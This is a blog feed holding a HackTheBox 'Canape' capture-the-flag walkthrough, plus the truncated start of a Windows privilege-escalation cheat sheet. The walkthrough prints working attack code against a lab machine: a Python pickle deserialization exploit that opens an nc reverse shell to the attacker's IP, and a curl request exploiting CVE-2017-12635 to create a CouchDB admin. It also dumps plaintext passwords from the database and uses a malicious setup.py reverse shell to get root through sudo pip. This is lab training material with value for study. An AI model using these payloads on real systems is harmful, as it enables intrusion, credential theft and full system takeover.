tag:blogger.com,1999:blog-13955923459707783832024-03-14T02:16:56.042+06:00The ShahzadaInfoSec Enthusiast | CTF Player | Perpetual Learner ||
~An InfoSec Type of Personal Blog...../TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.comBlogger6125tag:blogger.com,1999:blog-1395592345970778383.post-6269986260386167902021-12-15T22:01:00.006+06:002021-12-16T12:39:28.424+06:00HackTheBox: Canape | Python Pickle Deserialization + CouchDB Exploitation<div class="separator" style="clear: both; text-align: center;"><b><span style="font-family: courier; font-size: large;">HackTheBox: Canape</span></b></div><div class="separator" style="clear: both; text-align: center;"><b><span style="font-family: courier; font-size: large;"><br /></span></b></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjxbFK92bHxZ6j6D0WoAAjXsHbeW1OqVwI7GQLFQ3ABRWdbRKArekwDhX14uD3CJv10MbQmN4qBXKIH84W45Xd-4IRJOsPaIe9ijQaaq2eI-BMSRsvw6b8J0BtQxWa_ELXkxEmp8Z7By6WuWJOKw4jxWMjjcLpuSDzVq97VxUc2lkCHvFsoJzGo2MyA=s1194" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="766" data-original-width="1194" src="https://blogger.googleusercontent.com/img/a/AVvXsEjxbFK92bHxZ6j6D0WoAAjXsHbeW1OqVwI7GQLFQ3ABRWdbRKArekwDhX14uD3CJv10MbQmN4qBXKIH84W45Xd-4IRJOsPaIe9ijQaaq2eI-BMSRsvw6b8J0BtQxWa_ELXkxEmp8Z7By6WuWJOKw4jxWMjjcLpuSDzVq97VxUc2lkCHvFsoJzGo2MyA=s16000" /></a></div><p></p><p><span style="font-family: courier;"><b><span style="font-size: medium;">Summary:</span></b> Canape is a moderate difficulty machine. This machine requires a basic understanding of Python to be able to find the exploitable point in the application.</span></p><p><span style="font-family: courier; font-size: medium;"><b>Skills Required:</b></span></p><p></p><ul style="text-align: left;"><li><span style="font-family: courier;">Intermediate knowledge of Linux</span></li><li><span style="font-family: courier;">Basic/Intermediate knowledge of Python</span></li></ul><p></p><div><span style="font-family: courier;"><div><span style="font-size: medium;"><b>Skills Learned:</b></span></div><div><ul style="text-align: left;"><li>Exploiting insecure Python Pickling</li><li>Exploiting Sudo NOPASSWD</li><li>Exploiting Apache CouchDB</li></ul><div><br /></div></div><div><span style="font-size: medium;"><b>Enumeration:</b></span></div><div><b>First things first. We are going to run the NMAP scan. π</b></div><div>NMAP finds that the webserver with <b>.git</b> on port 80, ssh running on port 65535, and it looks like weβre going to deal with Ubuntu.</div><div><pre><code>
[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #nmap -sT -p- --min-rate 5000 -oA nmap/alltcp 10.10.10.70
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 20:24 +06
Nmap scan report for 10.10.10.70
Host is up (0.30s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 155.56 seconds
ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #nmap -A -p 80,65535 -oA nmap/initial 10.10.10.70
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-14 20:31 +06
Nmap scan report for 10.10.10.70
Host is up (0.29s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-title: Simpsons Fan Site
| http-git:
| 10.10.10.70:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: final # Please enter the commit message for your changes. Li...
| Remotes:
|_ http://git.canape.htb/simpsons.git
|_http-server-header: Apache/2.4.18 (Ubuntu)
65535/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:82:0b:31:90:e4:c8:85:b2:53:8b:a1:7c:3b:65:e1 (RSA)
| 256 22:fc:6e:c3:55:00:85:0f:24:bf:f5:79:6c:92:8b:68 (ECDSA)
|_ 256 0d:91:27:51:80:5e:2b:a3:81:0d:e9:d8:5c:9b:77:35 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.12 (92%), Linux 3.13 (92%), Linux 3.13 or 4.2 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.9 (92%), Linux 3.8 - 3.11 (92%), Linux 4.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 305.64 ms 10.10.14.1
2 305.04 ms 10.10.10.70
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.56 seconds</code></pre>
<br /><b><span style="font-size: medium;">
Web Fuzzing:
</span></b></div><div>This is a simple Fan site.</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjPX9vh089DqYWXClQfCqfIPzYRWTz7K8VMFNZFLeEq9knFTWgAwGtd9MvQ2G_rF75SM8E4okVslcA7CPWjv_UfqihhsEStZMq-OtK5V6La9Nob6-56oUoA81ECnFzaN_MfqhWyl6ijxcTNGWUJ9EbL3xaHhcBUwI11UgNxTPOQJ_EBV5UpLiw8gUuQ=s1996" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1466" data-original-width="1996" src="https://blogger.googleusercontent.com/img/a/AVvXsEjPX9vh089DqYWXClQfCqfIPzYRWTz7K8VMFNZFLeEq9knFTWgAwGtd9MvQ2G_rF75SM8E4okVslcA7CPWjv_UfqihhsEStZMq-OtK5V6La9Nob6-56oUoA81ECnFzaN_MfqhWyl6ijxcTNGWUJ9EbL3xaHhcBUwI11UgNxTPOQJ_EBV5UpLiw8gUuQ=s16000" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjIEuaduKuEoG6PpPu5ZBp_ljEmRnfGYQjyAmIWYiBO8xmkgZWcY-gtnc2KPKw70ACUpEn2nPSwLBNCh7eAQCYFIBZKkRIqrLwerOfNMd4mb2QVWCyXk3jHr5x-CIziUC98R6kU2sq_6Sh-w0Th3WLtsioXvkAbj_69oEuJxSX1s5LCIeqLsvFHreof=s2006" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1626" data-original-width="2006" src="https://blogger.googleusercontent.com/img/a/AVvXsEjIEuaduKuEoG6PpPu5ZBp_ljEmRnfGYQjyAmIWYiBO8xmkgZWcY-gtnc2KPKw70ACUpEn2nPSwLBNCh7eAQCYFIBZKkRIqrLwerOfNMd4mb2QVWCyXk3jHr5x-CIziUC98R6kU2sq_6Sh-w0Th3WLtsioXvkAbj_69oEuJxSX1s5LCIeqLsvFHreof=s16000" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhTWjkm9-9AkSBL-tDL2OQR1yDJFwSTZR4U1U95FmduiPvCTW--B8XK_PUWNP3zpUPHisamlYQEUhXC6jDVC5o2FVPqaXjYEcwEKh0QBFIPZp23DyuXwwgkjkjVCPZ4GpEt9h19NpcuI2YylfALooZRVbhEaXOKRN--ab6IF1N-s1vxJjTyWyGWcwEh=s2000" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1548" data-original-width="2000" src="https://blogger.googleusercontent.com/img/a/AVvXsEhTWjkm9-9AkSBL-tDL2OQR1yDJFwSTZR4U1U95FmduiPvCTW--B8XK_PUWNP3zpUPHisamlYQEUhXC6jDVC5o2FVPqaXjYEcwEKh0QBFIPZp23DyuXwwgkjkjVCPZ4GpEt9h19NpcuI2YylfALooZRVbhEaXOKRN--ab6IF1N-s1vxJjTyWyGWcwEh=s16000" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><div><span style="font-family: courier;"><br /></span></div><br /><div><br /></div><div>The submit form is something that we should focus on, but previously We've found a <b>.git</b> path via <b>NMAP scanning</b> and it's exposed a git repository. And if we run the <b>WFUZZ</b> then it will also reveal the same exposed git repo.</div><div><br /></div><div><b>wfuzz result:</b>
<pre><code>
ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #wfuzz -w /usr/share/seclists/Discovery/Web-Content/common.txt --hl 0,82 http://10.10.10.70/FUZZ
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.70/FUZZ
Total requests: 4702
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000012: 200 9 L 43 W 1075 Ch ".git/index"
000000011: 200 11 L 29 W 259 Ch ".git/config"
000000010: 200 1 L 2 W 23 Ch ".git/HEAD"
000000013: 200 17 L 70 W 1130 Ch ".git/logs/"
000000008: 301 9 L 28 W 309 Ch ".git"
000001029: 403 11 L 32 W 294 Ch "cgi-bin/"
000001063: 405 4 L 23 W 178 Ch "check"
000003385: 200 85 L 227 W 3150 Ch "quotes"
000003699: 403 11 L 32 W 299 Ch "server-status"
000003940: 301 9 L 28 W 311 Ch "static"
000003984: 200 81 L 167 W 2836 Ch "submit"
Total time: 156.3866
Processed Requests: 4702
Filtered Requests: 4691
Requests/sec.: 30.06650
</code></pre>
</div><div><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEhpRqwSYQemsqRPz3YjZ04M5x3WSkQ_mh8jG4QDJLDefrk8-pcUcP2cTMYhcvH2JrEf_Y-Hy1PPw23K7oLRZNv2tk7Vvd4na3JliR4bMCpdF942a4YtQ_Aw_11wJGau70p4cI-O_nlnrqM45VkUthwer_vBAs8nkiyIF9yw063XmALJJp8t-alvHzxw=s1674" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1268" data-original-width="1674" src="https://blogger.googleusercontent.com/img/a/AVvXsEhpRqwSYQemsqRPz3YjZ04M5x3WSkQ_mh8jG4QDJLDefrk8-pcUcP2cTMYhcvH2JrEf_Y-Hy1PPw23K7oLRZNv2tk7Vvd4na3JliR4bMCpdF942a4YtQ_Aw_11wJGau70p4cI-O_nlnrqM45VkUthwer_vBAs8nkiyIF9yw063XmALJJp8t-alvHzxw=s16000" /></a></div><div><span style="font-family: courier;"><br /></span></div><br /><div>When thereβs an exposed git repo on a website, we can get a full history of the site by using wget!</div><div><br /></div><div><b>wget commands:</b>
<pre><code>
ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #wget --mirror -I .git 10.10.10.70/.git
...
...
ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #cd 10.10.10.70/
ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape/10.10.10.70]
ββββΌ #git checkout -- .
ada]β[/home/theshahzada/Desktop/hackthebox/machines/canape/10.10.10.70]
ββββΌ #ls
__init__.py robots.txt static templates
</code></pre>
</div><div><br /></div><div><b><span style="font-size: medium;">Source Code Review:</span></b></div><div>With full access to the source, we see a python flask site. There are two sections that caught my eye, Submit and Check.</div><div><br /></div><div><b>source code:</b><pre><code>import couchdb
import string
import random
import base64
import cPickle
from flask import Flask, render_template, request
from hashlib import md5
app = Flask(__name__)
app.config.update(
DATABASE = "simpsons"
)
db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]
@app.errorhandler(404)
def page_not_found(e):
if random.randrange(0, 2) > 0:
return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(random.randrange(50, 250)))
else:
return render_template("index.html")
@app.route("/")
def index():
return render_template("index.html")
@app.route("/quotes")
def quotes():
quotes = []
for id in db:
quotes.append({"title": db[id]["character"], "text": db[id]["quote"]})
return render_template('quotes.html', entries=quotes)
WHITELIST = [
"homer",
"marge",
"bart",
"lisa",
"maggie",
"moe",
"carl",
"krusty"
]
@app.route("/submit", methods=["GET", "POST"])
def submit():
error = None
success = None
if request.method == "POST":
try:
char = request.form["character"]
quote = request.form["quote"]
if not char or not quote:
error = True
elif not any(c.lower() in char.lower() for c in WHITELIST):
error = True
else:
# TODO - Pickle into dictionary instead, `check` is ready
p_id = md5(char + quote).hexdigest()
outfile = open("/tmp/" + p_id + ".p", "wb")
outfile.write(char + quote)
outfile.close()
success = True
except Exception as ex:
error = True
return render_template("submit.html", error=error, success=success)
@app.route("/check", methods=["POST"])
def check():
path = "/tmp/" + request.form["id"] + ".p"
data = open(path, "rb").read()
if "p1" in data:
item = cPickle.loads(data)
else:
item = data
return "Still reviewing: " + item
if __name__ == "__main__":
app.run()
</code></pre>
</div><div><b>Submit</b></div><div>In this code there is an upload section:</div><div><pre><code>@app.route("/submit", methods=["GET", "POST"])
def submit():
error = None
success = None
if request.method == "POST":
try:
char = request.form["character"]
quote = request.form["quote"]
if not char or not quote:
error = True
elif not any(c.lower() in char.lower() for c in WHITELIST):
error = True
else:
# TODO - Pickle into dictionary instead, `check` is ready
p_id = md5(char + quote).hexdigest()
outfile = open("/tmp/" + p_id + ".p", "wb")
outfile.write(char + quote)
outfile.close()
success = True
except Exception as ex:
error = True
return render_template("submit.html", error=error, success=success)
</code></pre>
</div><div><br /></div><div><b>What's going on here?</b></div><div><div><ul style="text-align: left;"><li>The user submitted βcharβ only has to contain one of the character names from the whitelist. It doesnβt have to be one of the names.</li><li>The user has no control over the name of the file, but can know the name of the file.</li><li>Nothing is written to the file outside the two user-provided strings concatenated.</li><li>Thereβs a comment reference to /check and pickle.</li></ul><div><b>Check</b></div><div>Looking down the source, thereβs a path for /check:</div><div>
<pre><code>@app.route("/check", methods=["POST"])
def check():
path = "/tmp/" + request.form["id"] + ".p"
data = open(path, "rb").read()
if "p1" in data:
item = cPickle.loads(data)
else:
item = data
return "Still reviewing: " + item</code></pre>
</div></div></div><div><div><b>What's going on here?</b></div><div><ul style="text-align: left;"><li><b>cPickle.loads</b> will run the objectβs <b>__reduce__</b> method when it is unpickled. So an attacker can create a class with a <b>__reduce__</b> function that executes their desired commands, pickle an instance of that class, and pass that string to canape.</li></ul><div><b><span style="font-size: medium;">www-data Shell:</span></b></div></div></div><div><b><span style="font-size: medium;"><br /></span></b></div><div><span style="font-size: medium;"><b>Exploit:</b></span></div><div><span style="font-size: medium;"><pre><code>import os, cPickle, requests
from hashlib import md5
url = "http://10.10.10.70/"
class Exploit(object):
def __reduce__(self):
return (os.system,('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.7 9001 >/tmp/f',))
quote = cPickle.dumps(Exploit())
char = "(S'homer'\n"
p_id = md5(char + quote).hexdigest()
# Uploading data
upload_data = [('character',char), ('quote',quote)]
requests.post(url +"submit", data=upload_data)
# Triggering Pickle
id_data = [('id',p_id)]
(requests.post(url + "check", data=id_data))
</code></pre>
<pre><code>
ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #python2 exploit.py
</code></pre>
<pre><code>
ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.70] 40786
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("bash")'
www-data@canape:/$ </code></pre>
</span></div><div><span style="font-size: medium;"><b>Privilege Escalation: www-data β> homer:</b></span></div><div><span><b>CouchDB + Enumeration:</b></span></div><div><span>The page source also showed that the simpsons quotes were stored in a couchdb:</span></div><div><span><pre><code>app.config.update(
DATABASE = "simpsons"
)
db = couchdb.Server("http://localhost:5984/")[app.config["DATABASE"]]<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre>
The couchdb is only on localhost:</span></div><div><span><pre><code>www-data@canape:/$ netstat -ano | grep "LISTEN "
netstat -ano | grep "LISTEN "
tcp 0 0 0.0.0.0:36408 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:65535 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:5984 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 127.0.0.1:5986 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:4369 0.0.0.0:* LISTEN off (0.00/0/0)
tcp6 0 0 :::65535 :::* LISTEN off (0.00/0/0)
tcp6 0 0 :::4369 :::* LISTEN off (0.00/0/0)
</code></pre>
<br />
</span></div><div><span>To interact with couchdb, use curl from the local access. The passwords and _users dbs seem interesting, but neither is accessible. We can list ids in a database at the <b>/[database name]/_all_docs</b> path. To get an individual document, we visit <b>/[database name]/id</b><pre><code>www-data@canape:/$ curl http://127.0.0.1:5984/simpsons/_all_docs
curl http://127.0.0.1:5984/simpsons/_all_docs
{"total_rows":7,"offset":0,"rows":[
{"id":"f0042ac3dc4951b51f056467a1000dd9","key":"f0042ac3dc4951b51f056467a1000dd9","value":{"rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329"}},
{"id":"f53679a526a868d44172c83a61000d86","key":"f53679a526a868d44172c83a61000d86","value":{"rev":"1-7b8ec9e1c3e29b2a826e3d14ea122f6e"}},
{"id":"f53679a526a868d44172c83a6100183d","key":"f53679a526a868d44172c83a6100183d","value":{"rev":"1-e522ebc6aca87013a89dd4b37b762bd3"}},
{"id":"f53679a526a868d44172c83a61002980","key":"f53679a526a868d44172c83a61002980","value":{"rev":"1-3bec18e3b8b2c41797ea9d61a01c7cdc"}},
{"id":"f53679a526a868d44172c83a61003068","key":"f53679a526a868d44172c83a61003068","value":{"rev":"1-3d2f7da6bd52442e4598f25cc2e84540"}},
{"id":"f53679a526a868d44172c83a61003a2a","key":"f53679a526a868d44172c83a61003a2a","value":{"rev":"1-4446bfc0826ed3d81c9115e450844fb4"}},
{"id":"f53679a526a868d44172c83a6100451b","key":"f53679a526a868d44172c83a6100451b","value":{"rev":"1-3f6141f3aba11da1d65ff0c13fe6fd39"}}
]}
www-data@canape:/$ curl http://127.0.0.1:5984/simpsons/f0042ac3dc4951b51f056467a1000dd9
1000dd9tp://127.0.0.1:5984/simpsons/f0042ac3dc4951b51f056467a
{"_id":"f0042ac3dc4951b51f056467a1000dd9","_rev":"1-fbdd816a5b0db0f30cf1fc38e1a37329","character":"Homer","quote":"Doh!"}
www-data@canape:/$ curl http://127.0.0.1:5984/passwords
curl http://127.0.0.1:5984/passwords
{"error":"unauthorized","reason":"You are not authorized to access this db."}
www-data@canape:/$ curl http://127.0.0.1:5984/_users
curl http://127.0.0.1:5984/_users
{"db_name":"_users","update_seq":"11-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkQGPoiQFIJlkD1aHz7AkB5C6eLA6JnzqEkDq6gnam8cCJBkagBRQ6Xxi1C6AqN1PjNoDELX3iVH7AKIW6F7GLADeKW85","sizes":{"file":79122,"external":2678,"active":5042},"purge_seq":0,"other":{"data_size":2678},"doc_del_count":1,"doc_count":3,"disk_size":79122,"disk_format_version":6,"data_size":5042,"compact_running":false,"instance_start_time":"0"}
www-data@canape:/$ curl http://127.0.0.1:5984/_users/_all_docs
curl http://127.0.0.1:5984/_users/_all_docs
{"error":"unauthorized","reason":"You are not a server admin."}<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre><b>
Database Privileges Escalation:</b></span></div><div><span><div>CVE-2017-12635 is a way for non-authenticated users to get an admin access in couchdb by taking advantage of how Javascript and Erlang json parsers handle duplicate objects.</div><div>So, with CVE-2017-12635, to add an admin user, we just need to use an HTTP PUT:</div><pre><code>www-data@canape:/$ curl -X PUT -d '{"type":"user","name":"theshahzada","roles":["_admin"],"roles":[],"password":"thes"}' 127.0.0.1:5984/_users/org.couchdb.user:theshahzada -H "Content-Type:application/json"<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre>
Because we have a βrolesβ object in there twice, the CouchDB Javascript validation will only see the second one (empty), but then Erlang json parser will keep both, and let us be an admin.
</span></div><div><br /></div><div><span><b>Enumeration as admin:</b></span></div><div><span>Now, we can use the creds for the added admin user to read the rest of the db:</span></div><div><br />
<pre><code>
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords
curl http://theshahzada:thes@127.0.0.1:5984/passwords
{"db_name":"passwords","update_seq":"46-g1AAAAFTeJzLYWBg4MhgTmEQTM4vTc5ISXLIyU9OzMnILy7JAUoxJTIkyf___z8rkR2PoiQFIJlkD1bHik-dA0hdPGF1CSB19QTV5bEASYYGIAVUOp8YtQsgavcTo_YARO39rER8AQRR-wCiFuhetiwA7ytvXA","sizes":{"file":222462,"external":665,"active":1740},"purge_seq":0,"other":{"data_size":665},"doc_del_count":0,"doc_count":4,"disk_size":222462,"disk_format_version":6,"data_size":1740,"compact_running":false,"instance_start_time":"0"}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/_all_docs
csrl http://theshahzada:thes@127.0.0.1:5984/passwords/_all_do
{"total_rows":4,"offset":0,"rows":[
{"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
{"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
{"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
{"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
]}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
df3f7a001bebb8fc4380019e4hes@127.0.0.1:5984/passwords/739c5eb
{"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d
df3f7a001bebb8fc43800368dhes@127.0.0.1:5984/passwords/739c5eb
{"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f
df3f7a001bebb8fc438003e5fhes@127.0.0.1:5984/passwords/739c5eb
{"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}
www-data@canape:/$ curl http://theshahzada:thes@127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738
df3f7a001bebb8fc438004738hes@127.0.0.1:5984/passwords/739c5eb
{"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre><b>
SSH as homer:</b></div><div>That first password from the couchdb enumeration, "item": "ssh", is promising. We noticed in initial enumeration that SSH was running on port 65535. We try to ssh as the only user on the box, homer, with the password, β0B4jyA0xtytZi7esBNGpβ, and it works:</div><pre><code>ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #ssh -p 65535 homer@10.10.10.70
homer@10.10.10.70's password:
Welcome to Ubuntu 16.04.4 LTS (GNU/Linux 4.4.0-119-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
Last login: Tue Dec 14 09:31:52 2021 from 10.10.14.7
homer@canape:~$ cat user.txt
bce918*********288d
</code></pre>
<b style="font-size: large;">Privilege Escalation: </b></span><span style="font-family: courier; font-size: medium;"><b>homer β> root</b></span></div><div><span style="font-family: courier; font-size: medium;">homer can run pip with <b>sudo</b>:</span></div><div><span style="font-family: courier; font-size: medium;"><pre><code>homer@canape:~$ sudo -l
[sudo] password for homer:
Matching Defaults entries for homer on canape:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User homer may run the following commands on canape:
(root) /usr/bin/pip install *<span style="font-family: courier;"><span style="white-space: normal;">
</span></span></code></pre><b>
root shell:</b></span></div><div><span style="font-family: courier; font-size: medium;"><pre><code>import os
import socket
import subprocess
from setuptools import setup
from setuptools.command.install import install
class Exploit(install):
def run(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.7",9002))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p = subprocess.call(["/bin/sh", "-i"])
setup(
cmdclass={
"install": Exploit
}
)
</code></pre>
<br />
<pre><code>
homer@canape:~/theshahzada$ sudo pip install .
The directory '/home/homer/.cache/pip/http' or its parent directory is not owned by the current user and the cache has been disabled. Please check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
The directory '/home/homer/.cache/pip' or its parent directory is not owned by the current user and caching wheels has been disabled. check the permissions and owner of that directory. If executing pip with sudo, you may want sudo's -H flag.
Processing /home/homer/theshahzada
Installing collected packages: UNKNOWN
Running setup.py install for UNKNOWN ... -
</code></pre>
<pre><code>
ββ[root@theshahzada]β[/home/theshahzada/Desktop/hackthebox/machines/canape]
ββββΌ #nc -lnvp 9002
listening on [any] 9002 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.70] 47212
# python -c 'import pty;pty.spawn("bash")'
root@canape:/tmp/pip-GiMdT7-build# id
id
uid=0(root) gid=0(root) groups=0(root)</code></pre>
</span></div><div><span style="font-family: courier; font-size: medium;"><b><br /></b></span></div><div><span style="font-family: courier; font-size: medium;"><b>HTB Profile:</b> <a href="https://app.hackthebox.com/profile/37502">https://app.hackthebox.com/profile/37502</a><br /><b><br /></b></span></div><div><span style="font-family: courier; font-size: medium;"><b>Reference:</b></span></div><div><ul style="text-align: left;"><li><span style="font-family: courier; font-size: x-small;">I've taken some notes from the official writeup, <a href="https://0xdf.gitlab.io/2018/09/15/htb-canape.html" target="_blank">0xdf</a> writeup and <a href="https://www.youtube.com/watch?v=rs75y2qPonc" target="_blank">ippsec's</a> video</span></li><li><span style="font-family: courier; font-size: x-small;">https://raw.githubusercontent.com/vulhub/vulhub/master/couchdb/CVE-2017-12636/exp.py</span></li><li><span style="font-family: courier; font-size: x-small;">https://www.exploit-db.com/exploits/44913</span></li><li><span style="font-family: courier; font-size: x-small;">https://en.internetwache.org/dont-publicly-expose-git-or-how-we-downloaded-your-websites-sourcecode-an-analysis-of-alexas-1m-28-07-2015/</span></li></ul><div><span style="font-family: courier; font-size: x-small;"><br /></span></div></div>TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-72897583809332721262021-02-23T01:21:00.000+06:002021-02-23T01:21:08.698+06:00Windows Privilege Escalation<div style="text-align: center;"><span style="font-family: courier; font-size: x-large;"><b><span><br /></span></b></span></div><div style="text-align: center;"><span style="font-family: courier; font-size: x-large;"><b><span>Windows Local Privilege Escalation</span></b></span></div><div style="text-align: center;"><span style="font-family: courier; font-size: x-large;"><b><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguCYeOS95w0qTfpVldwbKzi_iy-Ag_dymfD_VS0tG43zFnp0EhyphenhyphenLqVc-Q031yDK373cV2raQ_ahScOvMN5HBeDVuNCr14L5snKWCby_wRPHbUXKCVqBUPhz7TVDaBA9hPqUTviZEGif48/s1920/windows.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1200" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEguCYeOS95w0qTfpVldwbKzi_iy-Ag_dymfD_VS0tG43zFnp0EhyphenhyphenLqVc-Q031yDK373cV2raQ_ahScOvMN5HBeDVuNCr14L5snKWCby_wRPHbUXKCVqBUPhz7TVDaBA9hPqUTviZEGif48/s16000/windows.png" /></a></div><br /></b></span></div><div style="text-align: center;"><div><span style="font-family: courier; font-size: large;"><b>==System Info==</b></span></div><pre><code><div style="text-align: left;"><span style="font-family: courier;">#Windows Version and Configuration</span></div><div style="text-align: left;"><span style="font-family: courier;">::OS Version::</span></div><div style="text-align: left;"><span style="font-family: courier;">systeminfo | findstr /B /C:"OS Name" /C:"OS Version"</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Extract patches and updates::</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic qfe</span></div><div style="text-align: left;"><span style="font-family: courier;"><br /></span></div><div style="text-align: left;"><span style="font-family: courier;">::Architecture::</span></div><div style="text-align: left;"><span style="font-family: courier;">wmic os get 